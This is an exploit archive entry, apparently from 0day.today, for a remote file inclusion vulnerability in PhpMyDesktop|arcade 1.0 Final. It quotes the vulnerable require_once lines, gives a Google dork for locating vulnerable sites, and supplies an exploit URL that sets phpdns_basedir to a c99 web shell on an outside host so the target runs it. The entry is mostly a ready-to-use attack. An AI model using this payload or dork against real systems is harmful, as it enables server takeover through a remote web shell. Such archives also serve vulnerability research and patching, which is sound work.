PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) RFI Vulnerability

2007-12-18T00:00:00
ID 1337DAY-ID-2377
Type zdt
Reporter RoMaNcYxHaCkEr
Modified 2007-12-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) RFI Vulnerability
================================================================



# Name : PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) Remote File Include
# Download From : http://mesh.dl.sourceforge.net/sourceforge/pmd-arcade/pmd_arcade_1_0_final.zip
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
# Google Dork : Powered by phpMyDesktop|arcade v1.0 (final)
============================================================================
# Vulne Code In File RR.php In Line 1 & 2 :
 
require_once("$phpdns_basedir/DNS/RR/A.php");
require_once("$phpdns_basedir/DNS/RR/AAAA.php");
# Exploit:
www.RxH.com/pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://no-hack.fr/shells/c99.txt?

============================================================================





#  0day.today [2018-04-08]  #